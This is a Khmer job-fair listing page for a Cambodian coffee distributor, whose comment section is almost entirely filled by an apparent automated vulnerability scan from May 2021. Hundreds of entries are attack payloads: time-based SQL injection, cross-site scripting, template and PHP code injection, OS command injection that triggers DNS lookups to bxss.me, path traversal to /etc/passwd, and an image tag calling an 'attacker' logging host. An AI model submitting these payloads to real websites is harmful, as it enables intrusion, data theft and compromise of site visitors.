ថ្ងៃទី 14 - 15 ខែ វិច្ឆិកា ឆ្នាំ 2020 ក្រសួងការងារ និងបណ្តុះបណ្តាលវិជ្ជាជីវៈ

ក្រុមហ៊ុន ខូហ្វី
ក្រុមហ៊ុន ខូហ្វី បានបង្កើតឡើងនៅឆ្នាំ២០០៩ ដែលជាក្រុមហ៊ុនទទួលសិទ្ធិ ចែកចាយផ្តាច់មុខនូវផលិតផលកាហ្វេ និងម៉ាស៊ីនកាហ្វេ អេសប្រេស្សូធំជាងគេនៅកម្ពុជា។ ការងារដ៏ចំបងរបស់ យើង គឺផ្តល់នូវសេវាកម្មដែលមានគុណភាពប្រកបដោយ វិជ្ជាជីវៈ និងការបង្កើតថ្មី ព្រមទាំងសច្ចៈភាពក្នុងការប្រកប អាជីវកម្ម។

ដាក់ពាក្យស្មើសុំការងារ (CV)!

ចំនួន CV ដែលបានដាក់ពាក្យរួច 107

សូមរៀបចំ CV ជាទម្រង់ Microsoft Word, PDF ឬជារូបភាព JPG។ ទំហំមិនធំជាង 5MB។


តម្រូវការជ្រើសរើសកម្លាំងពលកម្ម សរុប 57 កន្លែង

   
សំណួរ ចម្លើយ ឬ មតិយោបល់ ទៅក្រុមហ៊ុន

 • pHqghUme

  2021-05-06 09:02:10


  @@o6dyF


 • pHqghUme

  2021-05-06 09:02:07


  1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'


 • pHqghUme

  2021-05-06 09:02:07


  1'"


 • pHqghUme

  2021-05-06 09:01:59


  1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)


 • pHqghUme

  2021-05-06 09:01:56


  jmlGKnFN')) OR 814=(SELECT 814 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 09:01:53


  DCyaMlio') OR 340=(SELECT 340 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 09:01:49


  tfrKESuv' OR 881=(SELECT 881 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 09:01:46


  -1)) OR 884=(SELECT 884 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 09:01:40


  -5) OR 290=(SELECT 290 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 09:01:36


  -5 OR 572=(SELECT 572 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 09:01:31


  agNiUVSd'; waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 09:01:24


  1 waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 09:01:16


  -1); waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 09:01:09


  -1; waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 09:01:01


  1<3x3h1e<


 • pHqghUme

  2021-05-06 09:01:01


  (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/


 • pHqghUme

  2021-05-06 09:00:57


  1<img sRc='http://attacker-9665/log.php?


 • pHqghUme

  2021-05-06 09:00:55


  0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z


 • pHqghUme

  2021-05-06 09:00:51


  1<BYGhar x=9307>


 • pHqghUme

  2021-05-06 09:00:48


  0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z


 • pHqghUme

  2021-05-06 09:00:46


  1<ifRAme sRc=9439.com></IfRamE>


 • pHqghUme

  2021-05-06 09:00:43


  1<WWN1LM>OFIJI[!+!]</WWN1LM>


 • pHqghUme

  2021-05-06 09:00:40


  if(now()=sysdate(),sleep(15),0)


 • pHqghUme

  2021-05-06 09:00:39


  1uhbl6 <ScRiPt >XvKH(9283)</ScRiPt>


 • pHqghUme

  2021-05-06 09:00:34


  -1" OR 2+426-426-1=0+0+0+1 --


 • pHqghUme

  2021-05-06 09:00:33


  -1' OR 2+234-234-1=0+0+0+1 or 'ANiURZk6'='


 • pHqghUme

  2021-05-06 09:00:32


  -1' OR 2+951-951-1=0+0+0+1 --


 • pHqghUme

  2021-05-06 09:00:31


  -1 OR 2+906-906-1=0+0+0+1 --


 • pHqghUme

  2021-05-06 09:00:31


  -1 OR 2+101-101-1=0+0+0+1


 • pHqghUme

  2021-05-06 09:00:30


  9r7tNi5n


 • pHqghUme

  2021-05-06 09:00:30


  1<% contenteditable onresize=XvKH(9754)>


 • pHqghUme

  2021-05-06 09:00:26


  1}body{acu:Expre/**/SSion(XvKH(9819))}


 • pHqghUme

  2021-05-06 09:00:23


  1


 • pHqghUme

  2021-05-06 09:00:22


  <a HrEF=jaVaScRiPT:>


 • pHqghUme

  2021-05-06 09:00:18


  1


 • pHqghUme

  2021-05-06 09:00:16


  <a HrEF=http://xss.bxss.me></a>


 • @@PUo7G

  2021-05-06 09:00:12


  1


 • 1'"

  2021-05-06 09:00:07


  1


 • pHqghUme

  2021-05-06 09:00:07


  1<input autofocus onfocus=XvKH(9901)>


 • pHqghUme'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

  2021-05-06 09:00:05


  1


 • DynBmtdT')) OR 600=(SELECT 600 FROM PG_SLEEP(15))--

  2021-05-06 08:59:58


  1


 • Whmx6EgE') OR 713=(SELECT 713 FROM PG_SLEEP(15))--

  2021-05-06 08:59:51


  1


 • pWNxa6l8' OR 36=(SELECT 36 FROM PG_SLEEP(15))--

  2021-05-06 08:59:44


  1


 • pHqghUme

  2021-05-06 08:59:37


  1&lt;ScRiPt&gt;XvKH(9673)&lt;/sCripT&gt;


 • nKnR4UTg'; waitfor delay '0:0:15' --

  2021-05-06 08:59:37


  1


 • pHqghUme

  2021-05-06 08:59:32


  1\u003CScRiPt\XvKH(9792)\u003C/sCripT\u003E


 • 1 waitfor delay '0:0:15' --

  2021-05-06 08:59:28


  1


 • pHqghUme

  2021-05-06 08:59:26


  %31%3C%53%63%52%69%50%74%20%3E%58%76%4B%48%289875%29%3C%2F%73%43%72%69%70%54%3E


 • pHqghUme

  2021-05-06 08:59:21


  1<img/src=">" onerror=alert(9026)>


 • (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

  2021-05-06 08:59:18


  1


 • pHqghUme

  2021-05-06 08:59:17


  1<img src=xyz OnErRor=XvKH(9255)>


 • 0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

  2021-05-06 08:59:11


  1


 • pHqghUme

  2021-05-06 08:59:11


  1<img src=//xss.bxss.me/t/dot.gif onload=XvKH(9190)>


 • pHqghUme

  2021-05-06 08:59:07


  1<body onload=XvKH(9993)>


 • 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

  2021-05-06 08:59:03


  1


 • pHqghUme

  2021-05-06 08:59:03


  1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9028'>


 • pHqghUme

  2021-05-06 08:58:57


  1<isindex type=image src=1 onerror=XvKH(9058)>


 • if(now()=sysdate(),sleep(15),0)

  2021-05-06 08:58:56


  1


 • pHqghUme

  2021-05-06 08:58:51


  1<ScRiPt >XvKH(9425)</ScRiPt>


 • -1" OR 2+343-343-1=0+0+0+1 --

  2021-05-06 08:58:51


  1


 • -1' OR 2+584-584-1=0+0+0+1 or 'aicza24J'='

  2021-05-06 08:58:50


  1


 • -1 OR 2+892-892-1=0+0+0+1

  2021-05-06 08:58:49


  1


 • -1' OR 2+517-517-1=0+0+0+1 --

  2021-05-06 08:58:49


  1


 • -1 OR 2+325-325-1=0+0+0+1 --

  2021-05-06 08:58:48


  1


 • G1ZWGtPr

  2021-05-06 08:58:47


  1


 • pHqghUme

  2021-05-06 08:58:45


  1<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9301></ScRiPt>


 • pHqghUme

  2021-05-06 08:58:41


  1


 • pHqghUme

  2021-05-06 08:58:34


  1


 • pHqghUme

  2021-05-06 08:58:33


  1<ScRiPt >XvKH(9683)</ScRiPt>


 • pHqghUme

  2021-05-06 08:58:26


  1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%58%76%4B%48%28%39%39%37%38%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E


 • pHqghUme

  2021-05-06 08:58:25


  1


 • pHqghUme

  2021-05-06 08:58:19


  1


 • pHqghUme

  2021-05-06 08:58:19


  1<script>XvKH(9144)</script>


 • pHqghUme

  2021-05-06 08:58:18


  1


 • pHqghUme

  2021-05-06 08:58:13


  1<WU2GM0>EQUED[!+!]</WU2GM0>


 • pHqghUme

  2021-05-06 08:58:09


  1


 • pHqghUme

  2021-05-06 08:58:06


  1<ScRiPt >XvKH(9264)</ScRiPt>


 • pHqghUme

  2021-05-06 08:58:02


  "acxzzzzzzzzbbbccccdddeeexca".replace("z","o")


 • pHqghUme

  2021-05-06 08:58:00


  1


 • pHqghUme

  2021-05-06 08:57:58


  acx__${98991*97996}__::.x


 • pHqghUme

  2021-05-06 08:57:54


  acx[[${98991*97996}]]xca


 • pHqghUme

  2021-05-06 08:57:49


  acx{{98991*97996}}xca


 • pHqghUme

  2021-05-06 08:57:47


  1


 • pHqghUme

  2021-05-06 08:57:45


  1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>


 • pHqghUme

  2021-05-06 08:57:42


  <th:t="${acx}#foreach


 • pHqghUme

  2021-05-06 08:57:38


  <%={{={@{#{${acx}}%>


 • pHqghUme

  2021-05-06 08:57:34


  1


 • pHqghUme

  2021-05-06 08:57:32


  acux7852%C0%BEz1%C0%BCz2a%90bcxuca7852


 • pHqghUme

  2021-05-06 08:57:28


  acu2166%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca2166


 • pHqghUme

  2021-05-06 08:57:22


  1


 • pHqghUme

  2021-05-06 08:57:22


  19468498


 • pHqghUme

  2021-05-06 08:57:17


  '"()&%<acx><ScRiPt >XvKH(9214)</ScRiPt>


 • pHqghUme

  2021-05-06 08:57:13


  1'"()&%<acx><ScRiPt >XvKH(9822)</ScRiPt>


 • pHqghUme

  2021-05-06 08:57:08


  1


 • pHqghUme<ueC4M0<

  2021-05-06 08:57:07


  1


 • pHqghUme<img sRc='http://attacker-9746/log.php?

  2021-05-06 08:56:59


  1


 • pHqghUme<1GUJox x=9163>

  2021-05-06 08:56:55


  1


 • pHqghUme

  2021-05-06 08:56:54


  1


 • pHqghUme<ifRAme sRc=9313.com></IfRamE>

  2021-05-06 08:56:50


  1


 • pHqghUme<WZJSHK>APXPJ[!+!]</WZJSHK>

  2021-05-06 08:56:45


  1


 • pHqghUme

  2021-05-06 08:56:43


  1


 • pHqghUmeWaFi6 <ScRiPt >XvKH(9121)</ScRiPt>

  2021-05-06 08:56:40


  1


 • pHqghUme<% contenteditable onresize=XvKH(9858)>

  2021-05-06 08:56:35


  1


 • pHqghUme

  2021-05-06 08:56:32


  1


 • pHqghUme}body{acu:Expre/**/SSion(XvKH(9887))}

  2021-05-06 08:56:27


  1


 • pHqghUme

  2021-05-06 08:56:21


  1


 • <a HrEF=jaVaScRiPT:>

  2021-05-06 08:56:21


  1


 • pHqghUme

  2021-05-06 08:56:19


  1


 • pHqghUme

  2021-05-06 08:56:19


  1


 • pHqghUme

  2021-05-06 08:56:18


  1


 • pHqghUme

  2021-05-06 08:56:17


  1


 • pHqghUme

  2021-05-06 08:56:17


  1


 • <a HrEF=http://xss.bxss.me></a>

  2021-05-06 08:56:12


  1


 • pHqghUme

  2021-05-06 08:56:05


  1


 • pHqghUme<input autofocus onfocus=XvKH(9488)>

  2021-05-06 08:56:03


  1


 • pHqghUme

  2021-05-06 08:55:55


  1


 • pHqghUme&lt;ScRiPt&gt;XvKH(9149)&lt;/sCripT&gt;

  2021-05-06 08:55:54


  1


 • pHqghUme\u003CScRiPt\XvKH(9193)\u003C/sCripT\u003E

  2021-05-06 08:55:47


  1


 • pHqghUme

  2021-05-06 08:55:46


  1


 • %70%48%71%67%68%55%6D%65%3C%53%63%52%69%50%74%20%3E%58%76%4B%48%289913%29%3C%2F%73%43%72%69%70%54%3E

  2021-05-06 08:55:38


  1


 • pHqghUme<img/src=">" onerror=alert(9395)>

  2021-05-06 08:55:31


  1


 • pHqghUme

  2021-05-06 08:55:28


  1


 • pHqghUme

  2021-05-06 08:55:27


  1


 • pHqghUme<img src=xyz OnErRor=XvKH(9322)>

  2021-05-06 08:55:22


  1


 • pHqghUme<img src=//xss.bxss.me/t/dot.gif onload=XvKH(9705)>

  2021-05-06 08:55:18


  1


 • pHqghUme

  2021-05-06 08:55:17


  1


 • pHqghUme<body onload=XvKH(9509)>

  2021-05-06 08:55:11


  1


 • pHqghUme

  2021-05-06 08:55:06


  1


 • pHqghUme<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9663'>

  2021-05-06 08:55:05


  1


 • pHqghUme<isindex type=image src=1 onerror=XvKH(9069)>

  2021-05-06 08:54:58


  1


 • pHqghUme<ScRiPt >XvKH(9164)</ScRiPt>

  2021-05-06 08:54:48


  1


 • pHqghUme

  2021-05-06 08:54:48


  1


 • pHqghUme<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9587></ScRiPt>

  2021-05-06 08:54:38


  1


 • pHqghUme<ScRiPt >XvKH(9164)</ScRiPt>

  2021-05-06 08:54:32


  1


 • pHqghUme

  2021-05-06 08:54:31


  1


 • pHqghUme%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%58%76%4B%48%28%39%36%35%39%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

  2021-05-06 08:54:25


  1


 • pHqghUme<script>XvKH(9953)</script>

  2021-05-06 08:54:18


  1


 • pHqghUme

  2021-05-06 08:54:13


  1


 • pHqghUme<WSZHCN>LFXJN[!+!]</WSZHCN>

  2021-05-06 08:54:11


  1


 • pHqghUme<ScRiPt >XvKH(9726)</ScRiPt>

  2021-05-06 08:54:04


  1


 • "acxzzzzzzzzbbbccccdddeeexca".replace("z","o")

  2021-05-06 08:53:57


  1


 • pHqghUme

  2021-05-06 08:53:55


  1


 • acx__${98991*97996}__::.x

  2021-05-06 08:53:49


  1


 • acx[[${98991*97996}]]xca

  2021-05-06 08:53:40


  1


 • pHqghUme

  2021-05-06 08:53:35


  1


 • acx{{98991*97996}}xca

  2021-05-06 08:53:34


  1


 • 1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>

  2021-05-06 08:53:28


  1


 • <th:t="${acx}#foreach

  2021-05-06 08:53:17


  1


 • pHqghUme

  2021-05-06 08:53:14


  1


 • <%={{={@{#{${acx}}%>

  2021-05-06 08:53:09


  1


 • acux4493%C0%BEz1%C0%BCz2a%90bcxuca4493

  2021-05-06 08:53:02


  1


 • acu10738%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca10738

  2021-05-06 08:52:53


  1


 • pHqghUme

  2021-05-06 08:52:52


  1


 • pHqghUme9087338

  2021-05-06 08:52:44


  1


 • '"()&%<acx><ScRiPt >XvKH(9417)</ScRiPt>

  2021-05-06 08:52:36


  1


 • pHqghUme'"()&%<acx><ScRiPt >XvKH(9758)</ScRiPt>

  2021-05-06 08:52:28


  1


 • pHqghUme

  2021-05-06 08:52:25


  1


 • pHqghUme

  2021-05-06 08:52:24


  1


 • pHqghUme

  2021-05-06 08:52:23


  1


 • pHqghUme

  2021-05-06 08:52:22


  1


 • pHqghUme

  2021-05-06 08:52:22


  1


 • pHqghUme

  2021-05-06 08:52:21


  1


 • pHqghUme

  2021-05-06 08:52:20


  1


 • pHqghUme

  2021-05-06 08:52:14


  1


 • pHqghUme

  2021-05-06 08:52:03


  1


 • pHqghUme

  2021-05-06 08:51:58


  1


 • pHqghUme

  2021-05-06 08:51:57


  1


 • pHqghUme

  2021-05-06 08:51:52


  1


 • pHqghUme

  2021-05-06 08:51:50


  '.print(md5(31337)).'


 • pHqghUme

  2021-05-06 08:51:49


  ${@print(md5(31337))}\


 • pHqghUme

  2021-05-06 08:51:48


  ${@print(md5(31337))}


 • pHqghUme

  2021-05-06 08:51:47


  ";print(md5(31337));$a="


 • pHqghUme

  2021-05-06 08:51:46


  ';print(md5(31337));$a='


 • '.print(md5(31337)).'

  2021-05-06 08:51:45


  1


 • pHqghUme

  2021-05-06 08:51:45


  1


 • pHqghUme

  2021-05-06 08:51:45


  ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));


 • ${@print(md5(31337))}\

  2021-05-06 08:51:44


  1


 • pHqghUme

  2021-05-06 08:51:42


  <!--


 • ${@print(md5(31337))}

  2021-05-06 08:51:42


  1


 • ";print(md5(31337));$a="

  2021-05-06 08:51:41


  1


 • ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

  2021-05-06 08:51:40


  1


 • <!--

  2021-05-06 08:51:40


  1


 • ';print(md5(31337));$a='

  2021-05-06 08:51:40


  1


 • pHqghUme

  2021-05-06 08:51:40


  '"


 • pHqghUme

  2021-05-06 08:51:39


  1


 • '"

  2021-05-06 08:51:39


  1


 • pHqghUme

  2021-05-06 08:51:38


  1


 • pHqghUme

  2021-05-06 08:51:38


  1


 • pHqghUme

  2021-05-06 08:51:37


  1


 • pHqghUme

  2021-05-06 08:51:37


  1


 • pHqghUme

  2021-05-06 08:51:37


  1


 • pHqghUme

  2021-05-06 08:51:37


  1


 • pHqghUme

  2021-05-06 08:51:36


  1


 • pHqghUme

  2021-05-06 08:51:36


  1


 • )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

  2021-05-06 08:51:35


  1


 • pHqghUme

  2021-05-06 08:51:35


  /xfs.bxss.me


 • pHqghUme

  2021-05-06 08:51:35


  1


 • pHqghUme

  2021-05-06 08:51:35


  )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))


 • pHqghUme

  2021-05-06 08:51:34


  1


 • pHqghUme

  2021-05-06 08:51:34


  1


 • /xfs.bxss.me

  2021-05-06 08:51:34


  1


 • pHqghUme

  2021-05-06 08:51:34


  1


 • pHqghUme

  2021-05-06 08:51:33


  1


 • pHqghUme

  2021-05-06 08:51:33


  1


 • pHqghUme

  2021-05-06 08:51:33


  '"()


 • pHqghUme

  2021-05-06 08:51:33


  1


 • pHqghUme

  2021-05-06 08:51:33


  1


 • pHqghUme

  2021-05-06 08:51:32


  1


 • pHqghUme

  2021-05-06 08:51:32


  '+'A'.concat(70-3).concat(22*4).concat(110).concat(71).concat(104).concat(85)+(require'socket' Socket.gethostbyname('hithl'+'levphacf70fe0.bxss.me.')[3].to_s)+'


 • pHqghUme

  2021-05-06 08:51:32


  1


 • '+'A'.concat(70-3).concat(22*4).concat(109).concat(90).concat(102).concat(80)+(require'socket' Socket.gethostbyname('hitra'+'ocqdvvrv7ace4.bxss.me.')[3].to_s)+'

  2021-05-06 08:51:31


  1


 • pHqghUme

  2021-05-06 08:51:31


  1


 • pHqghUme

  2021-05-06 08:51:31


  "+"A".concat(70-3).concat(22*4).concat(104).concat(82).concat(115).concat(88)+(require"socket" Socket.gethostbyname("hitam"+"eforensr7a8ad.bxss.me.")[3].to_s)+"


 • pHqghUme

  2021-05-06 08:51:30


  1


 • pHqghUme

  2021-05-06 08:51:30


  bxss.me/t/xss.html?%00


 • pHqghUme

  2021-05-06 08:51:29


  HttP://bxss.me/t/xss.html?%00


 • "+"A".concat(70-3).concat(22*4).concat(122).concat(72).concat(97).concat(84)+(require"socket" Socket.gethostbyname("hitsj"+"tpwuiiun2be3d.bxss.me.")[3].to_s)+"

  2021-05-06 08:51:29


  1


 • '"()

  2021-05-06 08:51:29


  1


 • HttP://bxss.me/t/xss.html?%00

  2021-05-06 08:51:28


  1


 • bxss.me/t/xss.html?%00

  2021-05-06 08:51:28


  1


 • pHqghUme

  2021-05-06 08:51:28


  1


 • pHqghUme

  2021-05-06 08:51:27


  1


 • pHqghUme

  2021-05-06 08:51:27


  1


 • pHqghUme

  2021-05-06 08:51:27


  1


 • pHqghUme

  2021-05-06 08:51:27


  1


 • pHqghUme

  2021-05-06 08:51:26


  1


 • pHqghUme

  2021-05-06 08:51:26


  1


 • pHqghUme

  2021-05-06 08:51:25


  1


 • pHqghUme

  2021-05-06 08:51:25


  1


 • pHqghUme

  2021-05-06 08:51:23


  ".gethostbyname(lc("hitvi"."lvgxahch202c2.bxss.me."))."A".chr(67).chr(hex("58")).chr(98).chr(66).chr(97).chr(78)."


 • pHqghUme

  2021-05-06 08:51:22


  ^(#$!@#$)(()))******


 • pHqghUme

  2021-05-06 08:51:22


  '.gethostbyname(lc('hitkm'.'lmoroecb886e8.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(107).chr(71).chr(118).chr(76).'


 • '.gethostbyname(lc('hitzs'.'amsevdfi4e445.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(116).chr(67).chr(101).chr(84).'

  2021-05-06 08:51:21


  1


 • pHqghUme

  2021-05-06 08:51:21


  !(()&&!|*|*|


 • ".gethostbyname(lc("hitfi"."hroefiki1f56e.bxss.me."))."A".chr(67).chr(hex("58")).chr(100).chr(75).chr(102).chr(83)."

  2021-05-06 08:51:21


  1


 • pHqghUme

  2021-05-06 08:51:20


  1


 • pHqghUme

  2021-05-06 08:51:20


  )


 • pHqghUme

  2021-05-06 08:51:19


  1


 • !(()&&!|*|*|

  2021-05-06 08:51:19


  1


 • pHqghUme

  2021-05-06 08:51:19


  1


 • ^(#$!@#$)(()))******

  2021-05-06 08:51:19


  1


 • pHqghUme

  2021-05-06 08:51:19


  1&n912522=v978430


 • pHqghUme

  2021-05-06 08:51:18


  1


 • pHqghUme

  2021-05-06 08:51:18


  1


 • pHqghUme

  2021-05-06 08:51:18


  1


 • )

  2021-05-06 08:51:18


  1


 • pHqghUme

  2021-05-06 08:51:17


  1


 • pHqghUme

  2021-05-06 08:51:17


  1


 • pHqghUme

  2021-05-06 08:51:16


  1


 • pHqghUme

  2021-05-06 08:51:16


  1


 • pHqghUme

  2021-05-06 08:51:15


  1


 • pHqghUme

  2021-05-06 08:51:14


  `(nslookup hitopxtpcmyvua53ff.bxss.me||perl -e "gethostbyname('hitopxtpcmyvua53ff.bxss.me')")`


 • pHqghUme

  2021-05-06 08:51:13


  |(nslookup hitwqaynlyqwn4b742.bxss.me||perl -e "gethostbyname('hitwqaynlyqwn4b742.bxss.me')")


 • pHqghUme&n969982=v908531

  2021-05-06 08:51:11


  1


 • pHqghUme

  2021-05-06 08:51:09


  $(nslookup hitkbvtyewmho3fe52.bxss.me||perl -e "gethostbyname('hitkbvtyewmho3fe52.bxss.me')")


 • pHqghUme

  2021-05-06 08:51:09


  bxss.me


 • pHqghUme

  2021-05-06 08:51:08


  1some_inexistent_file_with_long_name%00.jpg


 • pHqghUme

  2021-05-06 08:51:08


  |echo ahfhag$()\ whptdm\nz^xyu||a #' |echo ahfhag$()\ whptdm\nz^xyu||a #|" |echo ahfhag$()\ whptdm\nz^xyu||a #


 • pHqghUme

  2021-05-06 08:51:08


  Http://bxss.me/t/fit.txt


 • pHqghUme

  2021-05-06 08:51:08


  (nslookup hitqujbywupsb686eb.bxss.me||perl -e "gethostbyname('hitqujbywupsb686eb.bxss.me')")


 • pHqghUme

  2021-05-06 08:51:08


  http://bxss.me/t/fit.txt%3F.jpg


 • bxss.me

  2021-05-06 08:51:07


  1


 • pHqghUme

  2021-05-06 08:51:07


  echo mnxika$()\ ghociu\nz^xyu||a #' &echo mnxika$()\ ghociu\nz^xyu||a #|" &echo mnxika$()\ ghociu\nz^xyu||a #


 • pHqghUme

  2021-05-06 08:51:07


  http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg


 • pHqghUme

  2021-05-06 08:51:07


  &echo jvvjng$()\ fqaaix\nz^xyu||a #' &echo jvvjng$()\ fqaaix\nz^xyu||a #|" &echo jvvjng$()\ fqaaix\nz^xyu||a #


 • http://bxss.me/t/fit.txt%3F.jpg

  2021-05-06 08:51:06


  1


 • 1some_inexistent_file_with_long_name%00.jpg

  2021-05-06 08:51:05


  1


 • pHqghUme

  2021-05-06 08:51:05


  1


 • pHqghUme

  2021-05-06 08:51:05


  12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡


 • Http://bxss.me/t/fit.txt

  2021-05-06 08:51:05


  1


 • pHqghUme

  2021-05-06 08:51:04


  1


 • http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg

  2021-05-06 08:51:04


  1


 • pHqghUme

  2021-05-06 08:51:03


  1


 • `(nslookup hitbohhhselzf3be59.bxss.me||perl -e "gethostbyname('hitbohhhselzf3be59.bxss.me')")`

  2021-05-06 08:51:03


  1


 • pHqghUme

  2021-05-06 08:51:02


  1


 • pHqghUme

  2021-05-06 08:51:02


  1


 • |(nslookup hitwfedzcborg6d97f.bxss.me||perl -e "gethostbyname('hitwfedzcborg6d97f.bxss.me')")

  2021-05-06 08:51:02


  1


 • pHqghUme

  2021-05-06 08:51:01


  1


 • pHqghUme

  2021-05-06 08:51:01


  1


 • pHqghUme

  2021-05-06 08:51:00


  1


 • pHqghUme

  2021-05-06 08:50:59


  1


 • pHqghUme

  2021-05-06 08:50:59


  1


 • pHqghUme

  2021-05-06 08:50:59


  1


 • (nslookup hitekeueliuej597c0.bxss.me||perl -e "gethostbyname('hitekeueliuej597c0.bxss.me')")

  2021-05-06 08:50:58


  1


 • pHqghUme

  2021-05-06 08:50:58


  1


 • $(nslookup hitjeutcfmtit249ff.bxss.me||perl -e "gethostbyname('hitjeutcfmtit249ff.bxss.me')")

  2021-05-06 08:50:58


  1


 • |echo nqeulu$()\ xbushw\nz^xyu||a #' |echo nqeulu$()\ xbushw\nz^xyu||a #|" |echo nqeulu$()\ xbushw\nz^xyu||a #

  2021-05-06 08:50:57


  1


 • 12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡

  2021-05-06 08:50:56


  1


 • &echo suicev$()\ sexgga\nz^xyu||a #' &echo suicev$()\ sexgga\nz^xyu||a #|" &echo suicev$()\ sexgga\nz^xyu||a #

  2021-05-06 08:50:56


  1


 • echo aywzoh$()\ gojpkv\nz^xyu||a #' &echo aywzoh$()\ gojpkv\nz^xyu||a #|" &echo aywzoh$()\ gojpkv\nz^xyu||a #

  2021-05-06 08:50:55


  1


 • RXdxOWdCNzk=

  2021-05-06 08:50:54


  1


 • pHqghUme

  2021-05-06 08:50:51


  1


 • pHqghUme

  2021-05-06 08:50:51


  ${9999152+9999849}


 • pHqghUme

  2021-05-06 08:50:51


  1


 • pHqghUme

  2021-05-06 08:50:50


  1


 • ${10000030+9999824}

  2021-05-06 08:50:50


  1


 • pHqghUme

  2021-05-06 08:50:49


  1


 • pHqghUme

  2021-05-06 08:50:48


  1<esi:include src="http://bxss.me/rpb.png"/>


 • pHqghUme

  2021-05-06 08:50:47


  1


 • pHqghUme<esi:include src="http://bxss.me/rpb.png"/>

  2021-05-06 08:50:47


  1


 • pHqghUme

  2021-05-06 08:50:46


  1


 • pHqghUme

  2021-05-06 08:50:46


  1


 • pHqghUme

  2021-05-06 08:50:46


  1


 • pHqghUme

  2021-05-06 08:50:46


  1


 • pHqghUme

  2021-05-06 08:50:45


  1


 • pHqghUme

  2021-05-06 08:50:45


  1


 • pHqghUme

  2021-05-06 08:50:44


  1


 • pHqghUme

  2021-05-06 08:50:44


  ../1


 • pHqghUme

  2021-05-06 08:50:44


  1


 • pHqghUme

  2021-05-06 08:50:43


  ../../../../../../../../../../../../../../etc/passwd


 • pHqghUme

  2021-05-06 08:50:43


  ../../../../../../../../../../../../../../windows/win.ini


 • ../pHqghUme

  2021-05-06 08:50:42


  1


 • ../../../../../../../../../../../../../../windows/win.ini

  2021-05-06 08:50:41


  1


 • pHqghUme

  2021-05-06 08:50:41


  1


 • pHqghUme

  2021-05-06 08:50:41


  1


 • pHqghUme

  2021-05-06 08:50:41


  1


 • ../../../../../../../../../../../../../../etc/passwd

  2021-05-06 08:50:40


  1


 • pHqghUme

  2021-05-06 08:50:39


  1


 • pHqghUme

  2021-05-06 08:50:38


  1


 • pHqghUme

  2021-05-06 08:50:38


  1


 • pHqghUme

  2021-05-06 08:50:38


  1


 • pHqghUme

  2021-05-06 08:50:37


  1


 • pHqghUme

  2021-05-06 08:50:37


  1


 • pHqghUme

  2021-05-06 08:50:37


  1


 • pHqghUme

  2021-05-06 08:50:37


  1


 • pHqghUme

  2021-05-06 08:50:37


  1


 • pHqghUme

  2021-05-06 08:50:36


  1


 • pHqghUme

  2021-05-06 08:50:36


  1


 • pHqghUme

  2021-05-06 08:50:35


  1


 • pHqghUme

  2021-05-06 08:50:35


  1


 • pHqghUme

  2021-05-06 08:50:34


  1


 • pHqghUme

  2021-05-06 08:50:34


  1


 • pHqghUme

  2021-05-06 08:50:32


  "+response.write(9316333*9454757)+"


 • pHqghUme

  2021-05-06 08:50:32


  1


 • pHqghUme

  2021-05-06 08:50:31


  response.write(9316333*9454757)


 • pHqghUme

  2021-05-06 08:50:31


  '+response.write(9316333*9454757)+'


 • "+response.write(9444851*9735334)+"

  2021-05-06 08:50:30


  1


 • response.write(9444851*9735334)

  2021-05-06 08:50:29


  1


 • pHqghUme

  2021-05-06 08:50:29


  1


 • '+response.write(9444851*9735334)+'

  2021-05-06 08:50:29


  1


 • pHqghUme

  2021-05-06 08:50:28


  1


 • pHqghUme

  2021-05-06 08:50:27


  oOpXoBin


 • pHqghUme

  2021-05-06 08:50:27


  1


 • pSdPxZNJ

  2021-05-06 08:50:26


  1


 • pHqghUme

  2021-05-06 08:50:26


  1


 • pHqghUme

  2021-05-06 08:50:25


  1


